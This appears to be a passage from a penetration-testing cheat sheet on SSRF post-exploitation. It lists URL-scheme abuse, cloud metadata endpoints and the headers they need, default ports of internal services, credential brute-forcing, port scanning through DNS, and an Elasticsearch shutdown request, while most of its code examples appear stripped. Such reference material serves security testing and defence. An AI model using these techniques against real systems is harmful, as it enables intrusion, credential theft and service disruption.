Post Exploitation
Abuse of URL schemes
Accessing local files
You can use the file
scheme to fetch the content of a file on the server:
Crafting TCP packets
You can use the ldap
, git
, or dict
URL schemes to create cleartext connections to TCP-based services.
Crafting UDP packets
You can send almost arbitrary UDP packets by using TFTP protocol.
This can be used to craft request to various UDP-services, like Memcached.
Java directory listing
Java lists directories via a file://
scheme, the following code will print a directory listing:
References:
Leaking internal domains
When connected to SMTP, internal domains might leak from the first line. To do this, connect to http://127.0.0.1:25
or some internal IP address http://10.0.0.6:25
with SMTP available and from the first line get the internal domain name: 220 subdomain.internal-host.com ESMTP Sendmail
TLS fields injection
TLS allows you to smuggle arbitrary data inside fields such as Server Name Indication or Session ID. You can use this to deliver payload to http/text-based services.
References:
Retrieving protocol versions
You can enumerate versions of the different protocols by sending a request to your server.
Abusing Gopher
Gopher is a communications protocol designed for distributing, searching, and retrieving documents. Gopher provides a wide range of abuse options, see more.
Abuse of cloud metadata
Amazon Web Services
No header required
References:
Google Cloud
Requires the header Metadata-Flavor: Google
or X-Google-Metadata-Request: True
on API v1 v1beta1 server and v0.1 metadata server endpoints were deprecated on September 30, 2020
References:
Microsoft Azure
Requires the header Metadata: true
DigitalOcean
No header required
Packet Cloud
No header required
Alibaba Cloud
No header required
OpenStack
No header required
Oracle Cloud
No header required
Docker
Docker Engine API is commonly available on ports 2375
and 2376
(tls). You can use the following paths to verify Docker Engine API presence:
A simple example of interacting with dockerd (also see: Daemon socket option):
Docker registry
Docker registry is commonly available on port 5000
. Docker registry can gain access to either read sensitive information stored in container images and/or modify stored container images.
For enumerating repositiories/images pay attention to the following tools:
reg - Docker registry v2 command line client and repo listing generator with security checks
regclient - Docker and OCI Registry Client in Go and tooling using those libraries
go-pillage-registries - Pentester-focused Docker registry tool to enumerate and pull images
Kubernetes
Kubernetes etcd API can contain API keys, internal IPs and ports:
kubelet
The kubelet commonly available on the default port 10250
.
kubelet read-only
The kubelet read-only commonly available on the default port 10255
. This port is generally only seen on older clusters, but can provide some useful information disclosure if present. It is an HTTP API which will have no encryption and no authentication requirements on it, so it is easy to interact with.
The most useful endpoint is /pods/
:
Abusing FTP
Credentials bruteforce
SSRF allows you to bruteforce credentials for resources that use Basic access authentication as an authentication mechanism. To do this, just use the following link:
Enumerating internal resources using anomaly responses
Sometimes you can count on anomaly responses when using SSRF, if the response to the execution of the request is not available to you. To do this, you need to access internal resources and measure the response time for each request. Response time is an indirect sign that may indicate the availability of a resource. Having sent a lot of requests, you need to search among them those for which the response time is different from all the others. This approach allows you to blindly bruteforce internal services, open ports, directories and files.
Port scanning
You can use the http
scheme for port scanning:
Port scanning using DNS
Many libraries try to access the resource by IP in the order that they are placed in DNS records. For example, if the DNS records look like this:
first there will be an attempted connect to 172.16.1.1
, and if problems arise, to 172.16.1.2
. This allows you to find out which ports are open and which are not.
For this you can also use the service http://1u.ms. For example, if you need to find available ports on 127.0.0.1
, you can use
this will allow you to change the port number to determine which port is available.
This shows that ports 22
and 6379
are open on 127.0.0.1
because there were no connection attempts for the IP address from the second DNS record.
It is worth paying attention to what DNS server resolves names on the backend side. DNS server can use the built-in round robin algorithm for resolving domain names and change the order of records
ASP.NET
Try to read trace.axd
, it keeps a log of all HTTP requests made to an application. This information includes remote client IP's, session IDs, all request and response cookies, physical paths, source code information, and potentially even usernames and passwords.
Apache Druid
Apache Druid is commonly available on ports 80
, 8080
, 8888
and 8082
. You can use the following paths to verify Apache Druid presence:
Apache Solr
Apache Solr is commonly available on port 8983
.
Apache Struts
Apache Struts is commonly available on ports 80
, 443
(tls), 8080
, 8443
(tls).
Apache Tomcat
Apache Tomcat is commonly available on ports 80
, 443
(tls), 8080
, 8443
(tls).
Consul by HashiCorp
Consul is commonly available on ports 8500
and 8501
(tls).
Elasticsearch
Elasticsearch is commonly available on port 9200
. You can use the following paths to verify Elasticsearch presence:
If you can send POST requests, you can try to shutdown the Elasticsearch instance by sending a POST request to the following path:
Java RMI
Java RMI commonly available on ports 1090
, 1098
, 1099
, 1199
, 4443-4446
, 8999-9010
, 9999
. SSRF vulnerabilities that allow arbitrary bytes can be used to perform deserialization or codebase attacks on the Java RMI default components.
JBoss
Jboss commonly available on ports 80
, 443
(tls), 8080
, 8443
(tls).
Jenkins
Jenkins commonly available on ports 80
, 443
(tls), 8080
, 8888
.
Memcache
Memcache is commonly available on port 11211
.
OpenTSDB
OpenTSDB commonly available on port 4242
.
Oracle PeopleSoft
PeopleSoft is commonly available on ports 80
and 443
(tls).
Oracle WebLogic
WebLogic is commonly available on ports 80
, 443
(tls) and 7001
. You can try to exploit known vulnerabilities:
Redis
Redis commonly available on port 6379
.
Remote debuggers
References
Last updated